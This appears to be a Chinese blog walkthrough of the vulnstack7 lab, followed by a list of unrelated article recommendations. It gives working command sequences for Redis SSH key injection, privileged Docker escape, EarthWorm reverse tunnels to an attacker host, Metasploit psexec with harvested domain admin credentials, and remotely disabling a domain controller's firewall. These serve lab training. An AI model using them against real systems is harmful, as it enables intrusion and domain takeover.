红日靶场vulnstack7:从外网突破到域控的完整渗透实战解析

李菜单

1. 靶场环境搭建与拓扑解析

红日安全团队推出的vulnstack7靶场是一个高度仿真的企业内网渗透测试环境。这个靶场最吸引我的地方在于它采用了三层网络隔离架构,完美模拟了现实中企业常见的DMZ区、办公区和核心数据区的网络划分方式。

我们先来看下这个靶场的网络拓扑结构。最外层是DMZ区,部署着一台Ubuntu服务器(Web1),这台机器配置了双网卡:一块桥接网卡对外提供服务,另一块连接VMnet8虚拟网络。中间层是第二网络区域,包含另一台Ubuntu服务器(Web2)和Windows 7主机(PC1),它们也都配置了双网卡分别连接VMnet8和VMnet14。最内层是第三网络区域,部署着域控制器Windows Server 2012和另一台Windows 7主机(PC2),它们只连接VMnet14网络。

在搭建环境时,有几个关键配置需要注意:

  • DMZ区的Ubuntu需要以root权限启动Redis和Nginx服务
  • 第二层网络的Ubuntu需要启动Docker容器
  • Windows 7 PC1需要以管理员权限启动通达OA并关闭防火墙
  • 所有机器的默认账户密码都在官方文档中提供,建议提前记录好

2. 外网渗透:Redis未授权访问实战

信息收集永远是渗透测试的第一步。使用nmap对目标网段进行扫描后,我们发现目标主机开放了6379 Redis端口。Redis未授权访问是近年来非常常见的一个高危漏洞,主要原因在于管理员没有为Redis配置认证密码,并且将服务绑定在了0.0.0.0地址上。

利用这个漏洞,我们可以直接通过redis-cli连接目标Redis服务。接下来就是经典的SSH公钥注入攻击:

  1. 在攻击机生成SSH密钥对:ssh-keygen -t rsa
  2. 将公钥格式化后写入Redis:(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > key.txt
  3. 通过Redis未授权访问写入目标主机:cat key.txt | redis-cli -h 目标IP -x set xxx
  4. 配置Redis将数据保存为authorized_keys文件:
    code复制config set dir /root/.ssh
    config set dbfilename authorized_keys
    save
    

成功获取SSH访问权限后,我在目标服务器上发现了nginx的配置文件,显示81端口的流量被反向代理到了内网的192.168.52.20服务器。这个发现为我们后续的内网渗透提供了重要跳板。

3. 突破内网第一层:Laravel RCE与Docker逃逸

通过访问81端口,我们发现了一个Laravel 8.29.0搭建的Web应用。这个版本的Laravel存在CVE-2021-3129漏洞,可以利用其Debug模式下的日志功能实现远程代码执行。

我推荐使用GitHub上开源的Exp工具来利用这个漏洞。实际操作中需要注意:

  • 使用哥斯拉2.92版本连接,高版本可能由于加密方式变更导致连接失败
  • 成功获取的shell位于Docker容器内部,需要先进行容器内提权
  • 通过查找SUID文件发现可疑的shell程序,利用环境变量劫持实现提权

在容器内获得root权限后,我们面临Docker逃逸的挑战。由于这个容器是以特权模式运行的,我们可以直接挂载宿主机磁盘:

code复制mkdir /gz
mount /dev/sda1 /gz

通过将SSH公钥写入宿主机的authorized_keys文件,我们成功逃逸到宿主机环境。这里有个小技巧:如果挂载失败,可以先尝试umount设备后再重新挂载。

4. 内网横向移动:多层代理与漏洞利用

现在我们已经控制了DMZ区的Web1和第二层网络的Web2。由于网络隔离,我们需要搭建代理通道才能继续深入内网。

首先使用EarthWorm工具建立SOCKS5反向代理:

  1. 攻击机执行:./ew_for_linux64 -s rcsocks -l 1080 -e 1234
  2. 在Web1上传ew并执行:nohup ./ew_for_linux64 -s rssocks -d 攻击机IP -e 1234
  3. 配置proxychains:echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf

通过代理扫描发现192.168.52.30运行着通达OA V11.3。这个版本存在多个漏洞,我们可以通过以下步骤利用:

  1. 使用BurpSuite抓包修改上传请求,上传图片木马
  2. 通过文件包含漏洞执行图片马中的代码
  3. 使用MSF的web_delivery模块获取Meterpreter会话

在获取Windows 7 PC1的控制权后,我们收集到域环境信息:

  • 域名:whoamianony.org
  • 域控:DC.whoamianony.org (192.168.93.30)
  • 域管理员:Administrator/Whoami2021

5. 攻陷域控:权限提升与最终控制

为了渗透第三层网络,我们需要建立更复杂的代理链:

  1. 攻击机:./ew_for_linux64 -s lcx_listen -l 1090 -e 1235
  2. PC1执行:ew_for_Win.exe -s ssocksd -l 999
  3. Web1执行:./ew_for_linux64 -s lcx_slave -d 攻击机IP -e 1235 -f PC1_IP -g 999

有了代理通道后,我们可以扫描93网段。虽然尝试永恒之蓝漏洞失败,但我们已经掌握了域管理员凭据。通过psexec模块成功获取域控权限:

code复制use exploit/windows/smb/psexec
set rhosts 192.168.93.30
set SMBUser administrator
set SMBPass Whoami2021
set payload windows/meterpreter/bind_tcp
exploit

在实际测试中,可能会遇到防火墙阻挡。这时可以通过已控制的PC1远程关闭域控防火墙:

code复制net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"
sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall

最后,使用Cobalt Strike的横向移动功能,我们成功控制了整个内网的所有主机。整个渗透过程涉及Web漏洞利用、权限提升、网络代理搭建、横向移动等多种技术,完整再现了真实攻防对抗中的经典场景。

内容推荐

Ureport2分组统计实战:小计与合计的父格配置精解
本文深入解析Ureport2分组统计功能中父格配置的核心原理与实战技巧,重点讲解如何正确设置小计与合计功能。通过实际案例演示父格配置方法,包括左父格和上父格的使用场景,帮助开发者避免常见错误,提升报表开发效率。
ICLR 2025 | TIMEMIXER++:从一维时序到二维图像,揭秘通用预测的SOTA突破
ICLR 2025论文TIMEMIXER++提出了一种革命性的时序预测方法,通过将一维时间序列转换为二维图像,结合双轴注意力机制和多尺度处理,实现了SOTA性能。该方法在金融预测、医疗诊断和工业维护等领域展现出卓越效果,计算效率比传统Transformer提升75%,为通用时序AI树立了新标杆。
pyqtgraph绘图实战指南:从PlotWidget到GraphicsLayout的灵活应用
本文详细介绍了pyqtgraph绘图实战指南,从PlotWidget的快速绘图到GraphicsLayout的复杂布局应用。通过实例演示如何灵活使用PlotWidget、PlotItem和GraphicsLayout,提升数据可视化效率,适用于传感器监控、ECG心电图等场景。
GNU Radio消息传递:从异步通信到外部交互的实战解析
本文深入解析GNU Radio消息传递机制,从异步通信原理到外部系统交互实践,详细介绍了消息端口注册、订阅机制及处理函数编写技巧。通过实战案例展示如何与ZeroMQ、REST API等外部系统集成,并分享性能优化与常见问题排查方法,帮助开发者高效利用消息传递机制提升软件无线电系统灵活性。
图像隐写分析实战——从数据集构建到含密图像生成
本文详细介绍了图像隐写分析的全过程,从数据集构建到含密图像生成,涵盖了S-UNIWARD、HUGO和WOW等算法的实战应用。通过具体代码示例和效果评估,帮助读者掌握生成含密图像的技术要点,提升在商业安全和知识产权保护领域的应用能力。
A2FSeg解析:自适应多模态融合网络在医学图像分割中的创新实践
本文深入解析A2FSeg网络在医学图像分割中的创新应用,重点介绍其自适应多模态融合网络设计。通过双阶段融合策略(平均融合与注意力机制驱动的自适应融合),有效解决临床中模态缺失问题,在BraTS2020数据集上展现优越性能。该框架不仅提升脑肿瘤分割精度,还具备向肝脏肿瘤等多病种扩展的潜力,为计算机辅助诊断提供新思路。
从电磁到热流:基于HFSS与Icepak的微带电路热设计实战解析
本文详细解析了基于HFSS与Icepak的微带电路热设计实战方法,涵盖电磁-热流协同仿真的必要性、模型准备、参数设置及散热优化。通过实际案例展示如何解决工程中常见的过热问题,提升系统可靠性,为射频/微波系统设计提供全面的热仿真指导。
SAP资产折旧调整实战:ABAA与ABMA的深度辨析与应用指南
本文深入解析SAP资产管理中ABAA与ABMA的核心区别与应用场景,帮助用户准确执行资产折旧调整。通过实战案例和配置指南,详细说明非计划折旧(ABAA)与折旧冲销(ABMA)的操作流程及账务影响,避免常见错误,提升资产管理效率。
Ubuntu18下IPQ6000 OpenWrt编译全流程:从环境配置到成功烧录
本文详细介绍了在Ubuntu18系统下为IPQ6000芯片编译OpenWrt固件的完整流程,从环境配置、源代码获取到解决常见编译错误和最终固件烧录。特别针对IPQ6000平台的特性,提供了实用的优化建议和硬件适配指南,帮助开发者高效完成嵌入式路由器固件开发。
告别玄学调参:用实际波形图带你一步步调试LPDDR5的Read Gate Training(附RDQS信号分析)
本文深入探讨了LPDDR5信号调试中的Read Gate Training技术,通过实际波形图分析RDQS信号,帮助工程师优化参数设置。文章详细介绍了调试装备配置、Toggle Mode和Enhanced Mode的实战流程,以及高级调试技巧,为DDR信号完整性提供了实用解决方案。
树莓派玩家看过来:用安信可M62-CBS模组(BL616芯片)给你的Pi加装双频Wi-Fi和蓝牙,保姆级教程
本文详细介绍了如何为树莓派安装安信可M62-CBS模组(基于BL616芯片),以提升双频Wi-Fi和蓝牙5.0性能。教程涵盖硬件连接、驱动编译、固件部署及实战配置,特别适合需要稳定无线连接和低功耗蓝牙功能的树莓派玩家。通过SDIO或USB接口,轻松实现高性能无线升级。
AUTOSAR内存管理进阶:拆解vLinkGen如何实现多阶段数据初始化(Zero/One/Early阶段实战)
本文深入解析AUTOSAR架构下vLinkGen模块的多阶段数据初始化策略,包括ZERO、ONE、EARLY等阶段的实战配置。通过详细代码示例和配置说明,帮助开发者实现嵌入式系统启动过程的精准控制,提升内存安全性和系统可靠性。特别适用于汽车电子和功能安全关键系统的开发。
Vben Admin中Vxe Table自定义筛选组件的设计与实践
本文详细介绍了在Vben Admin项目中如何设计与实现Vxe Table自定义筛选组件。通过三层模型架构设计、关键实现细节剖析以及与Vxe Table的深度集成,帮助开发者掌握自定义筛选组件的开发技巧,提升表格功能的灵活性和扩展性。特别适合需要处理复杂业务场景的前端开发者参考。
从实验室到产线:TWS耳机ANC调试实战与一致性管控
本文详细解析了TWS耳机ANC调试从实验室到量产的全流程,包括消音室环境搭建、参数调优技巧和生产一致性控制。重点介绍了调试环境的关键要素、滤波器配置的实用技巧以及量产中的常见问题解决方案,帮助工程师提升ANC调试效率与产品一致性。
STM32 Flash写保护锁死?巧用ST-LINK Utility解锁与防护全解析
本文详细解析了STM32 Flash写保护锁死的现象及解决方案,重点介绍了使用ST-LINK Utility进行解锁的实战指南。通过分步操作流程和常见问题排查技巧,帮助开发者有效应对Flash Timeout等错误,同时深入探讨了STM32的多级保护机制和防护策略,为嵌入式开发提供实用参考。
手把手教你用迅雷+WinSCP搞定Linux服务器上的Ollama离线更新(附Qwen3模型适配指南)
本文详细介绍了如何利用迅雷和WinSCP在Linux服务器上实现Ollama的离线更新,并提供了Qwen3模型的适配指南。通过分阶段下载策略和图形化传输工具,开发者可以高效完成AI服务的更新与部署,显著提升工作效率。
Windows下保姆级部署腾讯混元3D模型:从Anaconda到成功渲染一棵红柳树
本文提供Windows系统下腾讯混元3D模型的完整部署教程,涵盖从Anaconda环境配置到成功渲染3D红柳树的全流程。详细讲解PyTorch版本选择、模型文件获取、依赖管理及常见问题解决方案,帮助开发者在消费级硬件上实现专业级3D内容生成。特别针对NVIDIA显卡优化,提供性能调优建议和创意应用思路。
硬件设计——反激电源MOS管波形解析(1)
本文深入解析反激电源中MOS管的工作波形,探讨其在导通和关断阶段的电压电流特性。通过实际测试案例,揭示波形异常的原因及解决方案,帮助硬件工程师优化电源设计,提升效率和可靠性。重点关注MOS管波形分析在反激电源调试中的关键作用。
Flowable7.x实战指南(五)Vue3+SpringBoot3混合存储架构下的流程定义管理界面实现
本文详细介绍了在Vue3+SpringBoot3混合存储架构下实现Flowable流程定义管理界面的实战指南。通过MySQL+MongoDB的混合存储方案,优化流程定义管理的性能与灵活性,涵盖后端API设计、前端界面开发及数据一致性保障方案,助力开发者高效构建企业级流程管理系统。
泰凌微 TLSR8208 开发避坑指南:透传、串口与调试实战解析
本文详细解析了泰凌微TLSR8208蓝牙芯片开发中的常见问题,包括透传数据错位、串口与Debug引脚冲突等,提供了实用的解决方案和调试技巧,帮助开发者高效避坑。
已经到底了哦
精选内容
热门内容
最新内容
告别‘脑补’失败:PCDreamer如何用多视角图像解决复杂物体点云补全难题?
PCDreamer通过多视角扩散先验技术,革命性地解决了复杂物体点云补全难题。该方法将3D点云问题降维至2D图像处理,利用扩散模型的物体常识生成合理结构,再升维回3D空间,显著提升了细长结构、对称元素和拓扑复杂部件的补全精度。实验显示其平均Chamfer Distance降低38.7%,为自动驾驶、工业检测等场景提供了可靠解决方案。
别再死磕代码了!Origin弦图配色与图例美化全攻略(让审稿人眼前一亮)
本文详细介绍了Origin弦图的视觉升级技巧,从色彩美学到图例美化,帮助研究者打造专业级数据可视化效果。通过色彩理论应用、弦图结构优化和图例定制,提升弦图的视觉冲击力和学术呈现质量,让审稿人眼前一亮。
Zabbix API实战指南:从认证到自动化监控配置
本文详细介绍了Zabbix API的实战应用,从认证机制到自动化监控配置,帮助用户高效管理监控系统。内容包括主机管理、监控项配置、触发器设置等核心功能,并提供了Python代码示例和最佳实践,适合需要提升Zabbix自动化水平的运维人员。
ENVI植被指数计算实战:从NDVI到NDWI的完整指南
本文详细介绍了使用ENVI软件计算植被指数(如NDVI和NDWI)的完整流程与实战技巧。从波段选择、公式输入到异常值处理,结合BAND MATH工具的具体操作步骤,帮助读者掌握遥感影像分析的核心技术。文章还对比了ENVI与GEE的优缺点,并分享了项目实战中的宝贵经验与常见问题解决方案。
深入解析K8s Node节点连接拒绝问题:从dial tcp 127.0.0.1:8080错误到解决方案
本文深入解析Kubernetes Node节点连接拒绝问题,特别是'dial tcp 127.0.0.1:8080: connect: connection refused'错误的五大常见原因及解决方案。从环境变量配置、API服务器状态到网络连接性问题,提供系统化排查流程和实战解决方案,帮助开发者快速定位和修复K8s节点连接问题。
交叉验证的5种实战用法:从Scikit-learn的`cross_val_score`到防止模型“过拟合”你的验证集
本文深入探讨了交叉验证的5种高阶实战策略,从基础的K折到对抗验证集过拟合的嵌套交叉验证。通过Scikit-learn的`cross_val_score`等工具,帮助数据科学家在模型评估中避免常见陷阱,确保验证结果真实可靠。特别针对训练集、验证集和测试集的分割问题,提供了分层K折、时间序列CV等专业解决方案。
MySQL事务隔离级别深度解析:从理论到实战,彻底搞懂脏读、幻读与不可重复读
本文深度解析MySQL事务隔离级别,从理论到实战全面讲解脏读、幻读与不可重复读问题。通过实际案例演示不同隔离级别(读未提交、读已提交、可重复读)的应用场景与潜在风险,并提供金融、电商等行业的隔离级别选型指南,帮助开发者合理平衡数据一致性与系统性能。
深入解析STM32 ADC的多通道转换与中断处理机制
本文深入解析STM32 ADC的多通道转换与中断处理机制,详细介绍了电压输入范围、通道选择、转换顺序配置等核心原理,并分享了中断处理、DMA优化及常见问题排查的实战技巧。通过具体代码示例和优化方案,帮助开发者高效实现多通道ADC采集,提升嵌入式系统性能。
【折腾系列—All In One主机】4、 PVE虚拟机网卡直通实战与效能解析
本文详细介绍了在PVE虚拟机中实现网卡直通的实战步骤与效能优化技巧。通过对比桥接模式与直通模式的性能差异,展示了直通技术在提升网络吞吐量和降低CPU占用率方面的显著优势。文章涵盖硬件兼容性检查、BIOS设置、PVE系统配置以及iKuai软路由的直通优化,为All In One主机用户提供全面的解决方案。
Win10隐私保护:3分钟搞定文件夹和照片的‘最近浏览’记录(附注册表清理)
本文详细介绍了Windows 10中如何彻底清除文件和照片的'最近浏览'记录,保护用户隐私。从简单的图形界面设置到高级的注册表编辑,再到一键清理脚本的创建,提供了多种实用方法。特别适合共享电脑用户或注重隐私保护的技术人员,帮助消除文件资源管理器中的数字足迹。